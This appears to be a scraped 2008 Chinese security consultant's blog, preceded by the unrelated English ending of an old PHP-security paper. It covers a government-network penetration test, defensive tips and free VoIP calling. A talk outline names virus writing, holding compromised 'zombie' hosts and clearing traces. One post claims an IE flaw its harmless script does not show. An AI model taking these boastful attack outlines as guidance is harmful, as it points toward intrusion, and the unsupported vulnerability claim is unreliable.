- SRADV00001 - Arbitrary File Disclosure through PHP File Upload
http://www.securereality.com.au/sradv00001.html
- SRADV00003 - Arbitrary File Disclosure through IMP
http://www.securereality.com.au/sradv00003.html
- SRADV00006 - Remote command execution vulnerabilities in phpGroupWare
http://www.securereality.com.au/sradv00006.html
- SRADV00008 - Remote command execution vulnerabilities in phpMyAdmin and
phpPgAdmin
http://www.securereality.com.au/sradv00008.txt
- SRADV00009 - Remote command execution vulnerabilities in phpSecurePages
http://www.securereality.com.au/sradv00009.txt
- SRADV00010 - Remote command execution vulnerabilities in SquirrelMail
http://www.securereality.com.au/sradv00010.txt
- SRADV00011 - Remote command execution vulnerabilities in WebCalendar
http://www.securereality.com.au/sradv00011.txt

The last four were presented during my speech at the BlackHat Briefings in
Singapore and Asia in 2001. Audio/Video of the speech will (at some stage)
be available at http://www.blackhat.com. For anyone interested in security,
I can't suggest more strongly that you go to the briefings.

Finally, incase anyone wondered where the title came from and all those
quotes at the end of each section, they're from the short story "A Study In
Scarlet" by Sir Arthur Conan Doyle which was also the first story in which
the character Sherlock Holmes appeared.

"I must thank you for it all. I might not have gone but for you, and so have
missed the finest study I ever came across: a study in scarlet eh?" -
Sherlock Holmes



http://www.securereality.com.au/studyinscarlet.txt

远程安全风险评估,或者是结合性的渗透攻击测试

最近给朋友帮忙,测试某省政府网络(资产规模非常庞大)的安全性。他们去年已经做过安全项目,拉了国内2家著名的安全厂家,进行了一年时间的安全整改,前期也做了多次渗透测试,没有较大问题了。

虽然我的专长在于安全防护,保护系统和网络,保护方面还有一手,但在攻击方面,这么大年纪了,好长时间没做了,还真有些发怵。

但一做下来,发现问题太多了,系统和网络上,表面上看只开了邮件和web服务,只有几个jsp页面,而且每个jsp页面单独放在一台服务器上面运行(有钱就是好啊),做了大量的sql注入过滤,而且上了支持sql注入防护的防火墙和ids,在向内的网络使用了多台网闸,整个系统看上去固若金汤。朋友用了十几种扫描工具,包括web应用扫描的那几款著名工具,都没有发现任何问题,牛吧,政府网吧能做到这份上真是不多,因为是特别重要的部门,加上过去曾经出过事,领导非常重视,从预算中拿出一部分费用来做安全防护(对我们穷人来说也非常可观了),现在的系统,安全评估、加固一类已经做好很多次了。想想看,有哪个客户会花很多钱,买上国内国外好几套的扫描工具?几十台千兆防火墙?还有IDS。。。真是要命啊。

       任务看上去非常有压力,但既然工具扫不出东西来,咱就按着入侵者的思路分析下去吧。结果不做不知道,一做吓一跳,居然发现三大类安全风险,都对系统有非常严重的威胁。最后,按照这些威胁,做了多个方面的入侵,拿到内网的多个服务器的操作权限,账户资源出写报告了。

      做测试过程中了解到,有很多省市用了其中的某个系统,而且没有象他们这样专门再定制再加固。

      后来另一个在安全界打滚多年的老朋友就说呢,哪有你这么实在的,渗透测试嘛,一般只要通过一个漏洞进入系统,就算完成任务了,很少会全面地找问题,再针对这些问题,每一个方面都进行完全地入侵,最后再给出详细的整改方案,靠呀,一个项目把所有活都干完了,其它人吃什么呀?好吧,我觉的应该不单算成是渗透攻击测试,而应该算是完全的远程安全评估,哈哈,从效果上看,应该是这样的。

    工作告一段落,三天时间内只能晚上干活,还要写报告,累坏我了,以后不打算做渗透测试了,或者Zero知识的黑盒,远程风险评估了,还是发挥自己的长处,为大家提供安全风险评估、系统防御一类的东西吧。
      

2008年7月25日星期五

9月份要跟大家交流的内容



现在流行的攻击方法

大家都在使用的安全防护模式存在哪些问题

各种网络架构所面临的安全风险:举例演示google/baidu/msn等如何入侵

一个人控制一个国家的可能性:思路,通过演示验证思路的可行性和简易性

企业与个人的安全现状,防护手段,网络防御数据保护方法,信息网络影响下的经营风险

网络中一般存在哪些异常问题,如何识别和解决:病毒实现原理,病毒编写技术,通用防病毒技术,手工查杀病毒方法,常见网络故障排除方法

渗透攻击测试:选择渗透目标,渗透战术小组讨论,实施渗透,取得权限巩固肉鸡,清除痕迹,总结与提高

提供的系统防御方法

入侵检测与响应.如何察觉攻击,响应流程与方法,减少损害与保留证据

提供的安全服务:

安全策略
抗ddos攻击
安全风险评估、入侵损害恢复、系统加固、安全咨询与培训、事件紧急处理、入侵防护、安全评估、系统防御、系统优化、系统网络异常故障解决、入侵损害恢复,数据恢复与保护,抗ddos攻击、紧急响应等系统网络安全服务


收费标准:









2008年7月22日星期二

原来阿拉伯人喜欢用vpn啊

咱们喜欢用代理,阿拉伯这么喜欢VPN啊,不知道他们发布一些东西的时候,是不是大部分通过VPN

 google一下freevpn,让人惊讶地发现,居然这么多的
 ويرايش توسط freevpn : 2008-05-17 در ساعت 22:58. .... البته آن هم بطور کاملا رایگان میباشد. در تبلیغ FREEVPN  کاملا مجانی - صفحه 6 -
انجمن نوفیلتر

2008年7月21日星期一

最简单的网站防篡改方法

实际有个最简单的网站防篡改方法,尤其针对网站页面,效果挺好的,建议大家使用。
对于windows/linux下的网站,可以使用rsync,在独立于网站的另一台机器上,作为发布机,所有的内容都放在这台机器上面,网站只要与这台机器保持同步就可以了。可以把这台机器放在一个较为安全的地方,只放开rsync的服务,不需要多高的配置,只要网速高一些就可以了。网站永远都不会被修改,哈哈,简单粗暴有效啊。

当然,最好还是在linux下用,windows下的效率有些问题,不过要是网站规模不大的话,这个办法也挺好的,最起码对对付一阵儿了。但数据库问题还是无法解决,许多机构包括网易使用了那种游戏用的脚本LUMA做数据库代理,把所有的数据库访问包装起来,严格地过滤,现在看效果也不错啊,性能安全性都挺让人满意。
WINDOWS下还有个工具叫robocopy,不好这个好用。

Usage: rsync [OPTION]... SRC [SRC]... DEST
or rsync [OPTION]... SRC [SRC]... [USER@]HOST:DEST
or rsync [OPTION]... SRC [SRC]... [USER@]HOST::DEST
or rsync [OPTION]... SRC [SRC]... rsync://[USER@]HOST[:PORT]/DEST
or rsync [OPTION]... [USER@]HOST:SRC [DEST]
or rsync [OPTION]... [USER@]HOST::SRC [DEST]
or rsync [OPTION]... rsync://[USER@]HOST[:PORT]/SRC [DEST]

rsync -vzrtopg --progress --delete //192.168.1.9/g$ /cygdrive/j/tmp/extmail

rsync [选项]....[源]....[目地]

2008年7月19日星期六

90%以上的IE都可能受到影响

  测试方法:

<h1>ncph of something<i>before</i></h1>
<br> the <b>JavaScript</b>... ncphncph


<script type="text/jscript">
function init() {
document.write("The time is now: " + Date() );

}
window.onload = init;
</script>

And <u>ncph of something</u> after the <b>JavaScript</b>
 

2008年7月18日星期五

只要基于intel cpu的操作系统,都可以远程入侵?

只要基于intel cpu的操作系统,都可以远程入侵?只看到这么个消息,感觉这下问题大了,前一阵儿那么多的windows漏洞、DNS漏洞都已经让人崩溃了,这下子来了个更狠的。

   为什么可以在短时间内控制一个国家数量的计算机?攻击和渗透的精髓,就在于把攻击行为隐藏于正常的操作行为之中,然后再这个那个,这就是攻击的最高境界,哈

如何对web应用进行安全风险评估,保护web网站?

如何对web应用进行安全风险评估,保护web网站?
看到某公司出了一种产品,安星,是远程网站安全检查服务,这个服务挺好,确实能解决一部分问题,但并不象他们吹嘘的那么好,实际上还有许多安全风险,是通过远程评估无法找到的。比如文件系统权限、进程分配、后台数据加密、访问控制策略、备份及应急、系统强度、风险量化指标等等,有大量的东西,是无法通过远程扫一下就能找出来的。现在因为浮燥的氛围,许多人理解安全评估,好像就是用扫描工具扫一下就完事了,实际扫描工具能起到多大作用呢?连10%的作用都不到,有许多东西是用扫描工具无法检测出来的,另外扫描工具也有许多差异,并不是每一种都非常好用。扫描仅是风险评估的一个辅助工具,还有入侵渗透测试,都是大量工作中的一个点,仅仅是一个点的工作量而已。

以web应用的风险评估过程来说,比较完整的风险评估包括哪些工作呢?下面首先列举一下风险评估前准备的资源。需要特别说明的是,这只是应用评估中比较简单的个例,仅是风险评估工作中的一小部分。

本文只想发表在我的blog上面,请勿转载或引用。

对web应用进行风险评估,首先需要准备如下资源:
安全评估标准
漏洞扫描器
Web应用缺陷分析系统
数据库缺陷分析系统
安全开发规范知识性理解
资产统计表格,网络拓朴
威胁计算
相关系统日志
代码审计资源
完整安全策略
透彻清晰的安全需求

大体步骤和测试方法如下:
确定需要保护的信息资产有哪些?网站正常功能、显示页面及图片、后台数据、机密信息.......
分析现有资产,进行结构性描述与分析过程,包括子系统、边界、功能模式、网络数据流向、策略等。
分解应用系统,划分成为多个子集进行深入挖掘。周边网络、主机操作系统、WEB平台、后台功能代码、数据库等.
网络被动式信息收集、边界与关键节点通路评估。网关设备、过滤与控制设备、IDS、网闸。
主机安全性评估。
Port,服务、文件系统、网络连接、补丁、防病毒、安全功能组件、进程权限、访问策略、自动化报警、审计相关、备份、防ddos、防arp、系统强度分析.
Web平台安全评估:旗标、进程权限、配置管理、安全管理、内容管理、会话变量管理、防篡改。
后台应用安全性评估,包括注入、跨站、挂马、弱口令、绕过认证、输入验证、XML、web应用管理。
数据库安全评估,主要侧重于web相关.
找出威胁,记录、评估与计算、报告撰写.

上面只是列出纲要,大家看到了,每一项的后面,实际有非常大的工作量,里面有大家比较熟悉的注入测试、跨站测试、挂马测试,看一看,安星一类的产品做完了哪些东西呢?实际上大家都生活的非常浮燥,在国内,只要有关系和有资源,就可以掌握许多东西,现在我几乎免费地为人解决问题,解决信息网络中存在的问题,但还是没有足够的机会,现实中的系统,问题太多了,可以肯定地说,以现在的情况,只要有人组织一次有效的网络攻击,可以在很短的时间内,控制某一个国家大部分计算机系统,包括用了大量防火墙、入侵检测、配备了大量安全应急响应人员,比如某活动保障组的兄弟,为什么会这么轻易?因为现在的安全系统,安全防护模式,都有许多缺陷,落后于攻击方法的演进,尤其针对大规模的、慢速的、(p2p)分布式的、worm式的、自动智能防杀免杀的。。。。这些特征能不能集成到一个东西里面,实际的网络中存不存在?现在发现了没有?你认为呢?前些天有哥们说,现在有个科幻电影,就是针对一个国家的网络攻击,然后跟我说,他们如何通过网络几乎控制了核武器发动战争。我想告诉大家的是,科幻电影里描述的东西,在现实中已经存在了,许多攻击手段甚至是几年前已经使用了。现实是,只要找到三五个人,就可以发动针对一个国家的网络战争。尤其象我们国家这种安全现状,可能会受非常大的影响。奥运期间会不会出事?反正我不乐观,咱们知道的东西,破坏者可能知道的更多。

最近几天为某省做风险评估,看了一些国内知名公司做的东西,只有一个印象,大家都忙着赚钱呢。没办法,谁让咱没有关系没有资源呢?这个机会,还是哥们儿的公司没做过类似项目,让我在后台操作的,还得以他公司的名义干活,没白天没黑夜的,努力保证评估效果。这也是曲线救国,希望通过做项目的机会,认识一些人,把现在的风险说出来,让大家认识到,还有这么多问题没有解决,还有大量的工作需要落实。
早上起来,一口气写了许多,算是发泄一下郁闷吧。
------------------------------------------------------------------
本文只想发表在我的blog上面,请勿转载或引用。
-------------------------------------------------------------------
最近的挂马攻击、下载型病毒、BOT、网络安全现状预示,可能将会发生大范围事件,请记下我的联系方式 ,,如有紧急情况请尽快与我联系

mail: dyxian@139.com
skype:xianyua
gtalk:
irc:
aim:

发邮件即可,我的邮箱有PUSH功能,可以随时收到,即时联系。

2008年7月14日星期一

是做祥林嫂,还是做思考者??

翻了一下最近一二个月的日记,发现自己不停地在说,现在的安全风险有多严重,安全现状到了什么严重的程度,我们应该朝哪个方向努力,应该做些什么。很多人会非常感兴趣,都要我去演示一下最新的东西,包括已经存在安全模式,已经做过的评估,如何起不到应有的作用,如何挖掘出潜在的风险。。。。

忽然,我觉的陷入了一个怪套,快成死循环了,即使我在某个方面具有优势,我能不能再加强呢?撇下这些人,再前进一步,再看看现在的视角是不是狭窄?是不是猥琐?是不是傲慢?是不是没有生命力了?

   不必着急发展的事情,先把眼前自己最擅长的事情搞好,总有机会的,哪怕在这儿等着,守株待兔,也要保持自己的优势。

紧急通知

最近的挂马攻击、下载型病毒、BOT,网络安全现状,可能会有将会发生大范围事件,请记下我的联系方式 ,如有紧
急情况及时联系

    需要注意的是,国内做网络安全的同行,有些过于乐观了,或者是固步自封,有些很严重的威胁并没有意识到,会到多深的程度,奥运会保障组的兄弟,每个人都有自己的视野所限,不要过于自信了。每次跟某帮人交流,他们都说,你把自己掌握的拿过来交流一下吧,我想说,凭啥呀?我已经给了这么多建议,做了这么多工作,已经把很多东西说的很透彻了,还要怎么样啊?还要我自个儿掏路费,跑到一个过门都要搜身的地方,给你讲讲最新的安全防护思路?你们拿了这么多钱,干点儿人事行不行?最起码,真诚一些,谦虚一些,把自己应该干好的事情,努力做到最好的程度。

    太气人了。也许大环境就是这样,很多人都在忽悠,谁也不相信谁了,只有CPU能忠实执行每条指令,从键盘到代码,是自己最真诚的伙伴,其他的,哪还有半点儿乐趣?

2008年7月8日星期二

如何实现免费的通讯,免费的电话

一下子变的繁忙起来.左手是文字版本的最强大,右手是语音版本的最强大,语音文字我都已经实现了免费而强大的功能.具体说来,就是上网.短信.电话,我都 找到许多方法免费目的了.除了国内有名的随e聊,还有pica皮卡一类,还有更好的,和一般电话效果相较差不多的voip电话.每一个经过这几天我反复地 试验,效果都是超级一流棒.
先来说说我的左手机.左手机用的是treo 600,基于palm系统,带qwerty键盘,我最称赏它的速度,它的键盘,它的大量功能各异 的免费工具,呈称几万软件库,有大量你想像不到的东东,各种各样的功能.同样有这种魅力的手机是bb黑莓.有这种键盘的手机,安上五笔输入法,一分钟超过 一百字非常轻松,感觉和ibm tp600笔记本键盘,在手机上敲字变成了一种享受,盲打的五笔啊.其它也有大量的手机用了qwerty键盘,但就象小hei的键盘,已经成为绝响了,再 也没有达到treo手感的,所以,我的右手机,一块配置很高的ppc成了我的语音帮手,帮助我实现免费电话的功能.其实一些高配的nokia手机也能实现 免费电话功能,不过就象买游戏机,ppc手机可以实现硬件上的实惠,想想ps3,xbox360,多棒的价格啊,有了硬件,你可以选择不玩游戏,让这些硬 件发挥更大的功能,你可以做集群做服务器做计算做最棒的平台,哪一种选择都会让你的人生变的优美.
    下面详细说说,在treo上面如何实现免费的通讯功能.
接着刚才的话题继续说,先说说如何在treo上面免费通讯,再说说用我的右手机实现勉强电话功能.
treo用了轻便短快的palm系统,让你可以在如此低的硬件平台下实现这么多的强大功能.
  呀,不好,有事要处理,快点写下我的方案吧.
在treo下面,可以用随e聊绑定msn,写博客,雅虎通,qq等一些文字性的聊天功能,因为手机只支持到gprs,所以语音功能只能在数据线连接的情况 下才能使用.要是稍高些的硬件版本,能够支持edge,蓝牙,甚至wifi,那就没什么问题了.语音功能有几个工具,一个ar什么的效果不错,不过我很长 时间没去用了,因为连网速度太慢了.连个蓝牙都没有,比较让人郁闷了.
环境比较乱,文字性的免费聊天计有皮卡,随e聊,pushmail,还有什么来着?一会儿下线再翻看我的手机,都装了哪些通讯方面的东东,对了,还有个做做客可以免费发短信.先下线,一会儿回来
又翻看了一下手机,除了上面这些东东,还有UCWEB,ucmail,Xrose,最好的还有飞信,我有许多同事挂在这上面,互相发短信是免费的。刚才说的treo上用的语音工具,名字叫articulation,这个工具不大,效果却非常不错。恩,原来觉的有许多来着,怎么只找出这么几个呀。不过也不错了,msn/雅虎通/免费短信,已经帮助我们实现免费沟通了,这些都是基于gprs的,只会发生一点儿流量,配和gprs的流量管理工具Traffic Stat,只要不超过套餐费用就没事。

右手机的语音功能,主要是fring,eqo,随e聊,皮卡,Raketu-mobile,skype,voipcall,OctroTalk,飞信,还有什么呢?确实是好多呀,最好用的是前面三个,或者是四个,第三四个是国内,皮卡这几天老是注册不上,用着不爽。随E聊居然可以支持很多很多的手机,他们的开发团队真是太棒了,不断推出新功能,不断推出支持新手机的版本,非常有进取心。前二个,漂亮而实用,和国内的风格不一样,哈,支持的IM工具更多,效果更好,所以我主要用前二者,更重要的是,他们都可以实现非常棒的语音功能,可以方便地实现免费电话,哈,这样就再也不会受漫游之苦了,漫游加长途,一分钟一块多钱,谁也花不起这个钱啊。

除了手机的帮助,只要能找个上网的地方,在电脑上的选择就更多了,基本几十块儿,就可以不受限制地打电话了,这一方面与便携的手机通讯无关,网上已经大量地介绍了相关知识了,就不多说了,马上开饭了。byebye

2008年7月6日星期日

免费电话的几种方案

出差一趟,漫游费太多了,花了不少,于是研究一下如何免费语音通话。有几种方案:

1,国内的随e聊,这个功能挺多,效果不错,而且支持cmwap/cmnet,可以代理登录msn/qq/yahoo雅虎通,而且支持很多手机终端,感觉他们的开发团队非常有进步心,不断地推出新功能新版本,比飞信强多了。
2.皮卡pica,也非常好,比上面的稍微差一点儿,但体积比较小
3.fring,国外的一个东东,非常棒,可以支持你知道的大部分IMl软件,我主要用这个。
4.电话回拨,费用低一些,但无法解决漫游费问题。
5.网络电话,国内比较有名的uucall,效果不错,绿色版,不到1mb,资费也很便宜,遗憾没有手机版本,无法在ppc或symbian上面使用。
6.自建的sip服务器,通过im转到pstn线路上面,这个以前实验成功过,skype开放了许多api,一小段代码就可以实现了,运行后操作计算机上的modem就可以了,效果也非常好,应该接近CD的音质,哈哈。不方便的地方是我得整天开着机,又用不了几次。
7.在当地买个接听免费的卡,进行透传,显示原来的号码,网上有大量卖的。但要是呆的时间不长,不划算。
8.还有其它方式吗?暂时想到这些。
总之,voip是王道,当然,还可以通过蓝牙免费借当地人的电话用,不过这招有些损,咱干正经营生的就不要用了。